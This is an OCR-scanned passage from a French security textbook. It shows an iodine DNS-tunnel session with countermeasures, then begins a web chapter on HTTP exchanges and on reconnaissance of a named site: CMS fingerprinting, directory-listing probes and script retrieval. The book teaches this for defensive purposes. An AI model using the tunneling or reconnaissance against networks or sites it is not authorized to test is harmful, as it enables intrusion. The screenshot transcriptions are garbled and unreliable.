Une nouvelle interface est disponible via ifconfig. Afin de vérifier si le tun- 
nel est bien établi, nous pouvons faire un ping sur l'adresse IP du serveur : 
ping 10.0.0.1 


root@êchronologu:"# iodine -f 10,0,0,1 DE cc 
Version ok, both using protocol v 0x00000500, You are user #0 


Setting IP of dnsi to 10,0,0,2 
Setting MTU of dnsi to 1200 


Switching to Base64 codec 

Server switched to codec Base6d 

Autoprobing max downstream fragment size,,, (skip with -m fragsize) 

768 ok,, 1152 ok., 1344 ok,, 1440 ok,, 1488 ok,, 1512 ok,, 1524 ok,, will use 15 
24 

Setting downstream fragment size to max 1524,,, 

Sending queries for Rs cc" to 10,0,0,1 

I 


Nous constatons que le débit est faible de l'ordre d'une dizaine de Ko/s. 
Cela est dû en partie à la perte de paquets. En effet, les requêtes DNS sont 
de type UDP, ce protocole n'est pas réputé pour sa fiabilité. 


Cette technique peut aussi être appliquée à l'icmp à la place du DNS. 


Contre-mesure 


Lors de la création d'un hotspot, il est facile de régler ce type de problème 
en bloquant les requêtes ping et dns externes. 


Il est aussi simple de détecter le problème. En effet, s’il y a énormément de 
trafic de résolution DNS cela doit vite apparaître étrange à un administra- 
teur. 
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Conclusion 


Les failles réseaux sont des attaques redoutables et très connues, car elles 
ne sont pas faciles à corriger. Éradiquer ces failles revient à changer d'archi- 
tecture réseau : cela est coûteux, et dans le cadre du réseau des réseaux 
(Internet) tout changer en quelques mois serait utopique, il y a énormé- 
ment de machines connectées. Des améliorations sont à venir avec par 
exemple l'IPV6 mais ce seul changement de protocole sera long et il faudra 
rester compatible avec l'IPV4 pendant longtemps. 


Nous devons connaître les failles afin de mieux sécuriser nos architectures 
réseau. Ce maillon est très important car nous pouvons avoir les applica- 
tions les plus sécurisées, si derrière nous laissons passer des mots de passe 
ou les données, cela ne sert à rien. 
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Chapitre 6 
Les failles Web 


Rappels sur les technologies du Web 


Préambule 


Il n'est pas concevable de se former à la sécurité des sites Web sans avoir 
une bonne connaissance des mécanismes qui sont mis en jeu lors de la 
consultation de pages sur Internet. Nous allons rappeler dans ce chapitre 
les principales technologies du Web en expliquant les processus qu'ils met- 
tent en place. Si vous pensez que vos connaissances sont déjà bien avan- 
cées dans ce domaine, vous pouvez passer directement à la section Généra- 
lités sur la sécurité des sites Web de ce chapitre. 


Le réseau Internet 


L'Internet est un vaste réseau d'ordinateurs sur lequel transitent des mil- 
lions d'informations quotidiennement. Ces données sont de différentes 
natures (e-mail, page Web, chat, flux rss...) et plusieurs méthodes sont uti- 
lisées pour les acheminer (HTTP, SMTP, FTP...) Chaque type de données 
et chaque méthode d'acheminement peuvent présenter des failles de 
sécurité. 
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Deux très importants types de données sont principalement utilisés sur le 
réseau Internet : les pages Web et les e-mails. Dans ce chapitre nous déve- 
lopperons les bases des techniques d'attaques des sites Web et expliquerons 
les principaux réflexes qu'il faut avoir pour s'en prémunir. Mais avant de 
commencer à développer les attaques possibles sur un site Web il faut dans 
un premier temps bien comprendre les mécanismes qui sont mis en place 
lors de la consultation d'un site. 


Un site Web c'est quoi ? 


Un site Web est un ensemble de données cohérentes et ordonnées, compre- 
nant plusieurs types de médias (texte, image, son, vidéo...). La consultation 
de ces informations s'effectue par un logiciel que l'on nomme navigateur. 
Les données sont transmises au navigateur, à sa demande, par un serveur. 
Un site Web met donc en jeu une relation client/serveur. Les protocoles 
principalement utilisés pour l'échange des informations entre ces deux ordi- 
nateurs sont HTIP (HyperText Transfer Protocol) et HTTPS (HyperText 
Transfer Protocol Secured). Le mot Secured signifiant sécurisé, mais nous ver- 
rons que c'est loin de garantir une sécurité totale et que bien souvent il 
donne un faux sentiment de sécurité. Les langages les plus utilisés pour la 
description des pages sont le HTML et le XHTML. 


Consultation d'une page Web, anatomie des échanges 
client/serveur 


Lorsque nous souhaitons consulter un site Web avec notre navigateur nous 

commençons par lui fournir l'adresse du site, son URL (Uniform Resource 

Locator) ou plus largement son URI (Uniform Resource Identifier). Nous em- 

ploierons ici le terme URL car il est le plus utilisé pour désigner l'adresse 

d'un site Web. Supposons que nous voulions consulter le site 

http://mapage.com : 

- Nous fournissons à notre navigateur l'adresse http://mapage.com 

- Notre machine va dans un premier temps chercher à résoudre le nom du 
site afin d'obtenir l'adresse IP du serveur qui l'héberge. Cette résolution 
de nom se fait grâce à une requête DNS (Domain Name System). 
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- Une fois l'IP obtenue, notre navigateur va envoyer une requête HTTP, 
sur le port 80, en utilisant la méthode GET sur la racine du site. 

- Le serveur va alors nous répondre en renvoyant les données correspon- 
dant à la page d'accueil du site. Si des médias sont présents dans la page, 
plusieurs requêtes seront nécessaires afin d'aller chercher chacun d'eux. 


Illustrons cet échange par un exemple concret en consultant le site des Édi- 
tions ENI. Pour ce faire, nous utiliserons un logiciel permettant de capturer 
l'ensemble des échanges entre notre ordinateur et le réseau Internet : wire- 
shark. Nous obtenons le résultat présenté ci-dessous. 


file gdt View Go Capture Analyze Statistics Help 


BWNOAN GK SLAeSV FLE 


1 0.000000 __10,9.2,15 212.27.40.241 Standard query AAÂA www.editions-eni.fr 
2 0.924782 212.27.43.241 10.0.2.115 ES DNS Standard quary response 

3 0.035442 10.9.2.15 212.27.40.241 DNS Standard query AAAA ww: 6ditions-eni.fr 

4 0.073922 212.27.69.241 10.0.2.15 DNS Standard query response 

50.974505 10.9.2.15 212.27.40.241. >s Standard query À wwd:éditions-eni.fr 

6 0.116152 212.27.40.241 10:0.2.15 NS Standard query response A 61.90.245.20 à 

7 0,116858 10:6.2.15 81.89.245,20 TO 46522 > http [SYN] Seg-0 wWin=5840 Len=0 MSS=2480 TSV=118235 TÆR-0 W5-5 
& 0.161819 61.860.245. 10.0.2.125 TCP btrp > 46522 ISYN, Acx} Seq-0 ack=1 Winz8192 Len-0 MSS=1460 


46522 > http [ACK] Seq=} ack=1 Win-S840 Len=9 


90.161914  10.5.2.15 81.69. 245.28 TŒ 
ið 0.162360  10,9.2.15 81.80. 245,29 HTTP CET / HITP/1.i 
11 0.163068 81.30.245. 20 19.0.2.15 1P http > 46522 [ACK] seq=1 ack=387 Win-8760 Len-0 
12 0.560710  81.80.245.2 10.9.2:15 1P UO segænt of à reasserbled POU) 
= 13 0.550847 10.0.2.15 81.89,245, 46° *æ 46522 > http [ACK] Seq=397 Ack=528 Win=6432 Len=0 
“i4 0.562135 61.860.245. 10.0.2. 15 10 LTCP segment of a reasseblad POU) 
15 0.562199 10.8.2. 15 81.589.245.20 TĒ 46522 > http (ACK] Seg=357 Act=-10£9 win-7504 Len:0 
16 0,622542 81.909.245.20 10.0.2.15 Tœæ ITOP segment of a reassasbled PDU) 


> Frame 1 (79 bytes on wire, 79 bytes captured) 

b Ethernet 11, Sré: CadmusCo_35:1b:df (08:00:27:30:1b:df), Ost: Reslteku_ 12:35:02 (52:54:00: 12:35:02) 
b Internet Protocol, Src: 10.0.2.15 {1C.0.2.15), Dst: 213.27.40.241 (212.27.40.241} 

+ User Datagram Protocol, Sre Port: 39550 (34560), Ost Port: demain (53) 

b Domain Name System (query) 


þoco 52 54 00 12 35 02 08 00 27 39 1b df 03 00 45 O0 AT... "O... .E. 
0010 CO 41 cd te 40 00 PHEN 


T (Untied) -'reshark 


Capture avec wireshark 


Nous constatons bien des requêtes DNS sur les six premiers échanges afin 
de résoudre l'adresse du site. Puis notre machine établit une connexion 
TCP avec le serveur par l'échange de trois paquets bien connus SYN, 
SYN/ACK et ACK. Le navigateur envoie alors la requête GET suivante : 
GET / HTTP/1.1 
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Mais ce n'est pas la seule information que notre navigateur envoie. Il four- 
nit aussi beaucoup d'informations nous concernant afin que le serveur Web 
puisse renvoyer la réponse la plus appropriée à notre situation. C'est ce que 
nous appelons les informations de l'en-tête HTTP que voici dans notre cas : 


Host: www.editions-eni.fr 

User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:l.9.0.4) 
Gecko/2008112309 Iceweasel/3.0.4 (Debian-3.0.4-1) 
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-us,en;q=0.5 

Accept-Encoding: gzip,deflate 

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 

Keep-Alive: 300 

Connection: keep-alive 


Nous trouvons dans cet en-tête des informations sur notre navigateur, 
notre système d'exploitation, le langage utilisé, le codage des caractères que 
nous acceptons, etc. Il est intéressant de noter que rien qu'avec cet en-tête, 
les serveurs Web peuvent établir un bon nombre de statistiques. 


Mkrkemargue 


Pour mieux voir l'échange des données entre le client et le serveur dans wire- 
shark, il faut faire un clic droit sur le paquet TCP/SYN de la liaison client/serveur 
et demander « Show TCP Stream ». 


Après la réception de ces données, le serveur Web répond en conséquence. 
Il renvoie aussi un grand nombre d'informations. Dans un premier temps 


un en-tête : 


HTTP/1.1 200 OK 

Connection: Keep-Alive 

Content-Length: 170498 

Expires: -1 

Date: Wed, 10 Jun 2009 02:16:30 GMT 
Content-Type: text/html; charset=iso-8859-1 
Server: Microsoft-IIS/6.0 

X-Powered-By: ASP.NET 

X-AspNet-Version: 2.0.50727 

Set-Cookie: ASP.NET SessionlId=rmg2itynpxw5axmholz5gk45; path=/; 
HttpOnly 

Cache-Control: no-cache 

Pragma: no-cache 
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Nous ne détaillerons pas toutes les informations renvoyées mais les princi- 
pales. La première ligne indique que la page que nous demandons est dispo- 
nible. Nous avons ensuite des informations sur le type de contenu, ici du 
text/html, ainsi que l'encodage des caractères utilisé dans la page, ici 
iso-8859-1. Les données suivantes sont très intéressantes, nous trouvons le 
type de serveur (Microsoft-I[S) et sa version (6.0). Vient ensuite le langage 
utilisé pour réaliser les pages, ici ASP.NET. Un dernier élément intéressant 
est l'envoi d'un cookie de session. 


Nous reviendrons sur l'utilisation possible de toutes ces données mais pour 
le moment concentrons-nous sur la suite de la page : 


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 
“http://www.w3.org/TR/xhtmll/DTD/xhtmll-transitional.dtd"> 
<html xmlins="http://www.w3.org/1999/xhtml" xml:lang="fr"> 
<head><title> 
.Editions ENI : éditeur de livres informatiques, supports de cours 
et de formation, CD-Rom de formation, formation en ligne, 
E-Learning MEDIAplus 
</title> 

<script type="text/javascript"> 

var cbhoLangue isExpanded = false; 


function OpenPopup (URL) { 
var Top= 20; 
| var Left= (screen.width * 0,5) - 290; 


Nous nous limitons volontairement uniquement au début de la page pour 
ne pas remplir la totalité du livre avec du code HTML, ce qui n'est pas l'ob- 
jectif. La première ligne de la page est très intéressante car elle informe le 
navigateur sur le langage utilisé pour décrire la page. Ici le langage de 
description de page utilisé est du XHTML 1.0 dans sa version Transitional. 
Nous constatons aussi que la page contient des fonctions en javascript. 


Si nous poursuivions la lecture des échanges pour l'affichage de cette page 
nous constaterions que d'autres requêtes sont nécessaires : la demande de 
la feuille de style, la demande des images, etc. 
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1.5 Comment sont réalisées les pages Web ? 


Comme nous l'avons déjà évoqué, un site Web est un ensemble de médias 
rassemblés de façon cohérente. Les pages disponibles sur un serveur peu- 
vent être statiques ou dynamiques. 


Dans le cas de pages statiques, le code HTML/XHT ML de la page est sim- 
plement enregistré dans un fichier que le serveur se contentera de renvoyer 
au navigateur à sa demande. Il y a autant de fichiers que de pages consulta- 
bles. Il en est de même pour les médias. Ce type de site n'est pas simple à 
maintenir car toute modification entraîne une édition du code de la page. 
Cette technologie a pratiquement disparu de la surface de l'Internet faisant 
place aux sites dynamiques. Le seul avantage est qu'un site statique pré- 
sente bien souvent moins de failles de sécurité qu'un site dynamique. 


Dans le cas d'un site dynamique, les pages n'existent pas sur le serveur. 
Elles vont être construites à la volée en fonction des demandes du client. 
L'avantage est que les informations constituant la page peuvent être répar- 
ties sur plusieurs serveurs et prendre plusieurs formes (base de données, 
fichiers, etc.). Mais pour réaliser la page il faut bien un « programme » qui 
construit la page. Qui dit programme, dit langage de programmation. Le 
type de serveur utilisé va conditionner les langages possibles. Voyons 
quelques exemples : 

- serveur IIS (Internet Information Services) : langage ASP, ASP.NET 

- serveur Sun Java System Web Server : langage JSP, ASP, PHP 

serveur lighttpd : PHP, Perl, Ruby, Python 

serveur Apache : PHP, Perl, Ruby, Python 

=v ebe, 


Les deux serveurs qui dominent sur l'Internet sont IIS et Apache avec un 
large avantage pour Apache. En ce qui concerne les langages, nous trouvons 
principalement PHP, JSP et ASP.NET avec un large avantage pour PHP. 


Tous ces langages s'exécutent côté serveur, ce sont de plus des langages dits 
interprétés ou presque, mais ne rentrons pas trop dans les détails pour le 
moment, nous emploierons le terme de script. 
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Si nous voulions présenter tous les types de problèmes de sécurité que nous 
pouvons rencontrer sur Internet il faudrait plusieurs livres. Comme chaque 
jour de nouvelles failles sont découvertes, cela relève de l'impossible. Ce 
n'est pas notre objectif ici. Pour ces raisons nous nous concentrerons princi- 
palement dans cet ouvrage sur le couple Apache/PHP afin de décrire les 
mécanismes les plus importants liés à la sécurité. 


Pour le moment nous avons parlé des langages qui sont exécutés/interpré- 
tés côté serveur, mais il en existe aussi côté client : 

- Javascript 

Applet Java 

- Flash 

= etC, 


Le principal langage utilisé est le javascript. Flash n'est pas vraiment un 
langage mais présente un langage intégré et est très répandu sur la toile. 
Quant aux Applets, elles sont exécutées par la JVM (Java Virtual Machine) 
de notre machine. Elles permettent d'intégrer une application complète 
dans le navigateur et sont principalement utilisées pour cette spécificité. 


Pour comprendre les problèmes de sécurité que nous pouvons rencontrer 
sur les sites, il est important de connaître, outre les mécanismes d'échange 
client/serveur, les langages de programmation utilisés pour la réalisation 
des pages Web. Sans vouloir être un expert dans chaque langage, ce qui 


relève de l'exploit, un minimum est requis. Nous vous invitons donc à 
consulter d'autres ouvrages traitant de ces sujets. 


Comme nous utiliserons principalement le PHP et le Javascript dans ce 
livre, nous expliquerons ces langages au moment opportun. 
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Généralités sur la sécurité des sites Web 


Le piratage informatique fait souvent la une de la presse. Il arrive d'en- 

tendre que le site de telle entreprise ou tel parti politique a été attaqué. 

Mais détaillons un peu ce qui peut être recherché par un pirate informa- 

tique lorsqu'il s'attaque à un site. Une attaque lancée contre un site peut 

avoir pour objectif de : 

- Rendre le site indisponible, c'est un DoS (Denial of Service). Les raisons 
peuvent être multiples comme mettre en difficulté un concurrent com- 
mercial ou juste pour jouer, pour prouver une certaine maîtrise 
technique. 

- Modifier le contenu d'un site, pour faire du mal à une personne ou là 
encore simplement pour s'amuser. 

- Récupérer des informations non autorisées. Cette fois c'est plus sérieux, 
l'objectif ici peut être l'espionnage industriel, la récupération de fichier de 
cartes bancaires, d'informations confidentielles sur des personnes... 

- Prendre le contrôle du serveur dans l'objectif de lancer une attaque sur un 
autre serveur en tout anonymat, ou encore pour avoir une base d'attaque 
de l'entreprise où se situe le serveur. 

= ete 


Les raisons des attaques sont très diverses, du simple adolescent qui veut 
s'amuser ou prouver sa compétence technique aux terroristes qui peuvent 
paralyser une entreprise ou récupérer des données sensibles. 


Dans tous les cas, la réussite d'une attaque va être le fruit d'une analyse 

pointue du comportement du site Web. Celle-ci ne peut se faire sans une 

démarche cohérente. Plusieurs angles sont possibles pour aborder le pro- 
blème, mais il est important de traiter les points suivants : 

- Récupérer le maximum d'informations lors d'une utilisation normale du 
site : langage de programmation, arborescence, cookies, principe d'au- 
thentification, etc. 

- Découvrir les parties cachées du site : répertoire, structure des bases de 
données, etc. 

- Mettre en place une stratégie d'attaque en fonction des informations 
récoltées. 
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Petite analyse d'un site Web 


Cartographie des parties visibles d'un site Web 


Un site Web est constitué d'une multitude de pages qui sont obligatoire- 
ment organisées suivant une arborescence. C'est le plan du site. Chaque 
page est généralement accessible par un lien hypertexte présent dans un 
menu ou sur une page. Chaque lien pointe vers une URL ou URI précisant 
l'endroit où se trouve la ressource. De plus, des médias sont souvent pré- 
sents dans les pages et là encore il existe une URI pour chacun d'eux. Nous 
pouvons déjà à ce stade distinguer deux types de ressources, celles qui sont 
dans le même domaine que le site consulté et celles qui sont dans un autre 
domaine. Si nous voulons faire une cartographie du site, c'est-à-dire lister 
tous les éléments qui le composent, nous devons nous limiter au domaine 
où se trouve le site, car dans le cas contraire nous allons parcourir tout 
l'Internet étant donné la multitude de liens qui existent entre les pages 
Web. 


Il est même parfois difficile de lister l'ensemble des pages d'un même do- 
maine. En effet, depuis l'avènement de sites dynamiques, la construction 
des pages se fait en allant chercher de multiples informations sur de nom- 
breuses sources. Ce phénomène multiplie le nombre de pages disponibles et 
celles-ci ne sont plus qu'une représentation de l'information. Par exemple, 
dans un site présentant des relevés météorologiques, les pages sont cons- 
truites en allant chercher l'information dans la base de données des relevés. 
Si ceux-ci existent depuis 10 ans et que nous pouvons en demander une 
représentation par jour, mois ou année, le nombre de pages pouvant être 
généré devient impressionnant. Ce n'est donc pas la bonne méthode que de 
tenter d'analyser toutes les pages. 


En fait, il vaut mieux essayer d'analyser un comportement, il faut trouver 

le maximum d'informations que le site veut bien nous donner dans un 

fonctionnement normal. Nous pouvons alors plutôt parler de prise d'em- 

preinte que de cartographie. Voici un petit listing des questions que nous 

pouvons nous poser afin de recueillir le maximum d'informations : 

- Le site est-il statique ou dynamique et dans ce cas, dans quel langage 
est-il écrit ? 
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- Quelles sont les variables utilisées pour transmettre les requêtes ? 

- Y a-t-il des formulaires et quels champs utilisent-ils ? 

- Recevons-nous des cookies, quelles données contiennent-ils ? 

- Les pages contiennent-elles des médias ? 

- Le site fait-il appel à des bases de données ? 

- Pouvons-nous accéder à des dossiers, contenant des images par exemple ? 
- Le site fait-il appel à du Javascript, de l'AJAX ? 

- Quel serveur est utilisé, quelle est sa version ? 


Cette liste, qui n'est pas exhaustive, permet déjà de rassembler un grand 
nombre d'informations. Reprenons chaque point et voyons comment nous 
pouvons tenter d'obtenir une réponse. 


Le site est-il statique ou dynamique ? 


La première chose à regarder est l'extension du fichier appelé dans l'URL 
lors de la navigation. Si celle-ci est du type .php ou .asp ou encore .jsp, c'est 
que le site est écrit dans un de ces langages, sauf exception rarissime si un 
petit malin a voulu nous tromper en modifiant les réglages de son serveur. 
Si l'extension est du type .html ou .htm c'est probablement une page sta- 
tique, mais attention ici rien n'est moins sûr. En effet les serveurs permet- 
tent de faire de l'URL Rewriting (réécriture d'adresse). Cette technique per- 
met un meilleur référencement des sites et masque le passage des variables 
ainsi que le type de langage utilisé. 


Par exemple si nous appelons une page php : 


| pages .php?id=5&menu=2&article=7 


celle-ci peut être réécrite comme suit : 

| pages_5_2_7.html 

Nous constatons quand même que la page porte un drôle de nom, ce qui 
peut nous mettre sur la piste. 


Si l'URL ne nous donne aucune information, nous pouvons nous lancer 
dans l'analyse du code source de la page. Dans Firefox la combinaison des 
touches [Ctrl] + [U] affiche ce code. 
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Remarque 

À ce propos, un petit mot sur les logiciels que nous utilisons. Nous sommes des 
fervents défenseurs des logiciels libres car ceux-ci présentent pour nous un cer- 
tain nombre d'avantages. Nous ne rentrerons pas dans un long argumentaire 
pour expliquer notre choix, car ce n'est pas l'objet de ce livre. Nous travaillons 
donc sous Linux, mais ce n'est pas obligatoire pour suivre ce chapitre, par 
contre nous utilisons le navigateur Firefox, disponible sous Linux comme sous 
Windows. Il présente l'avantage de disposer d'une multitude d'add-ons, petits 
modules complémentaires bien utiles pour analyser un site et même l'attaquer. 


Analysons par exemple le code source de la page d'accueil du site d'ACISSI 
(http://www.acissi.net) dont l'URL ne nous donne pas beaucoup d'infor- 
mations. Nous ne prendrons que des extraits du code pour ne pas trop sur- 
charger ce livre : 


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" 
"http://www.w3.org/TR/xhtml1/DTD/xhtmll-strict.dtd"> 
<html xmlins="http://www.w3.org/1999/xhtml" lang="fr" 
xml:lang="fr"> 


<!--//--><![CDATA(//><!-- 
jQuery.extend(Drupal.settings, { "basePath": "/", "dhtmlMenu": 
M l "doubleclick", "clone" J; "googleanalytics": 


Nous remarquons que le code de la page est du XHTML 1.0 Strict et 
voyons apparaître un peu plus bas le mot Drupal. Ce mot nous parle, car 
Drupal est un CMS (Content Management Systems ou système de gestion de 
contenu) écrit en PHP. Comme en naviguant sur le site d'ACISSI nous ne 
voyons pas de pages avec l'extension php, nous pouvons en déduire que le 
site utilise de la réécriture d'adresse. 


Dans le cas où nous n'arrivons pas à découvrir le langage utilisé pour écrire 
le site que nous étudions, nous aurons peut-être cette information en ana- 
lysant les autres points. 
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3.1.2 Quelles sont les variables utilisées ? 


Dans un site Web dynamique il n'existe pas autant de scripts que de pages, 
sinon cela n'aurait aucun sens. Donc un script donné va être capable de 
construire une multitude de pages en fonction des informations qu'il va 
recevoir. Celles-ci peuvent être transmises dans l'URL en utilisant la 
méthode GET. Une analyse de l'URL permet de lister les variables utilisées. 
Par exemple : 


| forum. php?id=234&user=codej 


Nous appelons ici le script « forum.php » en passant de variables « id » et 
« user ». Si une réécriture d'adresse a été mise en place sur le serveur, il 
devient alors difficile de déterminer le nom des variables. 


Y-a-t-il des formulaires et quels champs utilisent-ils ? 


Une autre façon de transmettre des données au script est l'utilisation des 
formulaires. C'est alors la méthode POST qui est généralement utilisée, 
mais ce n'est pas une obligation. Pour connaître ces champs, nous pouvons 
regarder le code source ou espionner la transmission des données au serveur 
comme nous l'avons déjà fait avec « wireshark ». Nous verrons un peu plus 
loin qu'il existe des outils bien plus pratiques, mais il est important d'avoir 
une bonne vision des choses. C'est pour cela que nous vous proposons 
régulièrement de regarder le code source de la page pour bien comprendre 
les mécanismes qui sont mis en jeu. Regardons par exemple le code du 
formulaire suivant : 


<form action="identif2.php" method="POST"> 

<input type="hidden" name="type" 
value="7d4d77af8208a8b7fc9a2246d97db964"> 

Votre message : <input type="text" name="message"><br> 
<input type="submit" value="Valider"> 

</form> 
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Nous voyons dans ce formulaire trois champs : 

- Un champ de type hidden de nom type qui est donc caché et qui n'ap- 
paraîtra pas aux yeux de l'internaute. 

- Un champ de type text de nom message qui correspond à un champ 
visible pour l'utilisateur dans lequel il peut saisir du texte. 

- Un champ de type submit qui correspond au bouton de validation du 
formulaire. 


Nous voyons aussi qu'à la soumission du formulaire, celui-ci va transmettre 
ses données au script identif2.php par la méthode POST. 


Le serveur envoie-t-il des cookies ? 


Les cookies sont de petits fichiers contenant du texte que le serveur peut 
envoyer au client afin de stocker des informations lui permettant de 
mémoriser une situation. Un des types de cookies les plus couramment uti- 
lisés est le cookie de session. Ceux-ci interviennent dans le mécanisme d'au- 
thentification du client pour éviter à l'internaute de saisir de nouveau son 
identifiant/mot de passe à toutes les pages. Il permet en principe au ser- 
veur d'identifier le client de façon univoque. Mais ce n'est pas la seule utili- 
sation des cookies. Ceux-ci peuvent aussi permettre de mémoriser vos 
habitudes, une configuration, etc. 


Dans Firefox, une des façons de regarder si le site envoie des cookies est 
d'aller dans le menu Outil puis de cliquer sur Informations sur la page. 
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Nous obtenons alors cette fenêtre : 


ME 5 “ a | | 


(aoi Médias Flux Permissions Sécurité 


ACISSI : 

Adresse (URL) : _ http:/wwwacissi.net/ 

Type : text/htinl 

Mode de rendu : Mode de respect des standards 

Encodage : UTF-8 

Taille : 5,15 Ko {5 269 octets) 

Modifiée le : jeu. 11 juin 2009 05:08:06 CEST 

- Méta (4 balises) 
QD ass a CT NE ti a n 
Content-Type text/html; charset=utf-8 | 
Content-Type text/html; charset=utf8 f 
language fr 
Content-Style-Type text/css 


informations de sécurité pour cette page 
Ce site Web ne fournit pas d'informations concernant son identité. 


Connexion non chiffrée 


Détails | 


Information sur la page visitée 


À son ouverture nous avons les informations générales sur la page. Si nous 
allons dans l'onglet Sécurité (illustration suivante), nous voyons si le site 
envoie des cookies. Nous pouvons avoir un détail de ceux-ci en cliquant sur 
Voir les cookies. 
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© = & « : 
Général Médias Flux Permissions EX 


Identité du site Web 
Site Web : www.aclssi.net 
Propriétaire: Ce site Web ne fournit pas d'informations concernant son identité. 
Vérifiée par: Non spécifié 


Vie privée et historique 


Ai-je déjà visité ce site Web auparavant ? Non 

Ce site Web collecte-t-il des infarinations (cookies) sur mon [Voites cookies] 
ordinateur ? Oui Voir. les cookies 
Ai-je un mot de passe enregistré pour ce site Web ? Non {Voir les mots de passe enregistrés] 


Détails techniques 
Connexion non chiffrée 
Le site Web www.acissi.net ne supporte pas le chiffrement pour la page actuellement affichée. 
Les informations envayées sur Internet sans chiffrement peuvent étre vues par d'autres personnes durant leur transit. 


Information de sécurité sur la page visitée 


Le site contient-il des médias ? 


Nous pouvons, comme pour les cookies, lister les médias présents sur la 
page dans l'onglet Médias de la fenêtre Information sur la page de Fire- 
fox. Nous avons même la possibilité dans cet onglet de sauvegarder tous les 
médias, mais surtout nous voyons le chemin de chacun d'eux, ce qui peut 
être très intéressant. 


Le site fait-il appel à des bases de données ? 


Ce point est beaucoup plus délicat à traiter. Nous ne pouvons pas voir en 
première approche si le site utilise des bases de données. Suivant la nature 
du site nous pouvons avoir de fortes présomptions mais pour en obtenir la 
preuve il faudra faire appel à des notions et outils plus avancés que ceux 
que nous avons vus actuellement. Nous pouvons néanmoins dire que si le 
site est dynamique, il y a de grande chance pour qu'il utilise une base de 
données. 
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Pouvons-nous accéder à certains dossiers ? 


Généralement nous ne pouvons pas lister le contenu des dossiers contenant 
les images et autres fichiers, sauf si cette fonctionnalité est volontairement 
autorisée. Mais il arrive que les serveurs soient mal configurés et autorisent 
la visualisation du contenu de dossiers sensibles. Nous pouvons avoir une 
idée des chemins à tester en regardant la source des médias ou d'autres 
fichiers que le site utilise. Par exemple si nous regardons les médias de la 
pages d'accueil d'ACISSI nous avons une image dont le chemin est : 
http://www.acissi.net/sites/default/themes/acissi_v2/images/fond1.jpg 


Mais si nous tentons d'accéder au dossier www.acissi.net/sites/default/ 
themes/ acissi_v2/images nous avons en retour Forbidden qui correspond à 
l'erreur 403, soit "refus de traitement de la requête". Par contre, si nous 
essayons de lister le dossier d'un miroir "Debian", comme par exemple : 
http://cdimage.debian.org/debian-cd/5.0.1/1386/iso-cd/, cette fois cela fonc- 
tionne, ce qui est normal puisque autorisé volontairement. 


Toute l'astuce ici consiste donc à lister un dossier pour lequel le concepteur 
du site a oublié de régler une interdiction. 


Le site fait-il appel à du Javascript ? 


Pour savoir si le site fait appel à du Javascript, il suffit de regarder le code 
source. Deux cas sont possibles, soit le code est directement écrit dans la 
page, soit il est dans un fichier séparé et est chargé par la page. Dans tous 
les cas, comme notre navigateur doit pouvoir accéder à ce code nous pou- 
vons le récupérer pour l'analyser. Par exemple au début du code source de 
la page d'accueil d'ACISSI nous trouvons : 


<script type="text/javascript" src="/misc/jquery.js?U"></script> 
<script type="text/javascript" src="/misc/drupal.js?U"></script> 
<script type="text/javascript" 
src="/sites/default/files/languages/fr_816ac8cfa9d87cla57c49584baa 
730fe.js?U"></script> 

<script type="text/javascript" src="/sites/all/modules/dhtml menu/ 
dhtml menu.js?U"></script> 

<script type="text/javascript" 
src="/sites/all/modules/lightbox2/js/lightbox.js?U"></script> 
<script type="text/javascript"> 

<!--//--><! [CDATA[//><!-- 

jQuery.extend(Drupal.settings, { "basePath": "/", "dhtmlMenu": 
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[ "doubleclick", "clone" ], "googleanalytics": { "trackOutgoing": 
1, "trackMailto'": 1, "trackDownload": 1, 


“"trackDownloadExtensions": "7z|aac|avilcsv|doc|exelflv|gif|gz|jpe? 
glisim(314le?g) Imov|lpdaf|phpsipnglpptlrar|sit|ltar|torrent|txt|wmal 
wmavlxls|zxm1|z16" g; "lighthox2"; { "rtl": "O0", "file path": "7 


(\\w\\w/)sites/default/files", "default image": 
"/sites/all/modules/lightbox2/images/brokenimage.jpg", 

"border sizé“; nIr0, "font color": "O00", "box: colon": "FERU 
"top position": "", "overlay opacity": 0.8, "overlay color": 
"000", "disable close click": true, "resize sequence": 0, 
"resize speed": 400, "fade in speed": 400, "slide down speed": 
600, "use alt layout": false, "disable resize": false, 
"disable zoom": false, "force show nav": false, "loop items": 


false, "node link text": "View Image Details", "node link target": 
false, "image count": "Image !current of !total", "video count": 
"Video !current of !total", "page count": "Page !current of ! 
total", "lite press x close": "press \x3ca href=\"#\" 
onclick=\"hideLightbox(); return FALSE; \"\x3e\x3ckbd\x3ex\x3c/kbd\ 
x3e\x3c/a\x3e to close", "download link text": "", "enable login": 
false, "enable contact": false, "keys close": "c x 27", 

"keys previous": "p 37", "keys next": "n 39", "keys zoom": "z", 
"keys _ play pause": "32", "display image size": "", 
"image node sizes": "()", "trigger lightbox classes": "", 

“"trigger lightbox group classes": "", "trigger slideshow classes": 
Un MErFigger lightframe. classes", 

"trigget lightframe group classes": "", "custom class handler": 0, 
"custom trigger classes": "", "disable for gallery lists": true, 
"disable for acidfree gallery lists": true, 

"enable acidfree videos": true, "slideshow interval": 5000, 


"slideshow automatic start": true, "slideshow automatic exit": 
true, "show play pause": true, "pause on next click": false, 
"pause on previous click": true, "loop slides": false, 

"iframe width": 600, "iframe height": 400, "iframe border": 1, 
"enable video": false } }}); 

AE=S<ITIS 


</script> 
<script type="text/javascript"> </script> 
<!--[if lte IE 6]> 
<script type="text/javascript"> 

$ (document) .ready(function()f{ 

$ (document) .pngFix(); 

Ig 
</script> 
<! [endif] --> 
<!--<link rel="alternate" type="application/rss+xml" 
title="ACISSI" href="/rss.xml" />--> 
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Nous remarquons une combinaison de scripts enregistrés dans des fichiers 
séparés, comme lightbox.js, et de Javascript directement écrits dans la page. 
Nous pouvons récupérer le code des fichiers Javascript en les appelant dans 
l'URL du navigateur, par exemple : 
http://www.acissi.net/sites/all/modules/lightbox2/js/lightbox.js 


Sous Linux nous pouvons aussi récupérer le fichier grâce à la commande 
wget : 


Huget www.acissi.net/sites/all/modules/lightbox2/js/lightbox.js 


Dans le cas du site d'ACISSI nous aurions aussi très bien pu récupérer l'en- 
semble des scripts en téléchargeant le code source de Drupal qui est un 
CMS libre. L'ensemble des scripts est donc fourni lorsque nous téléchar- 
geons Drupal. 


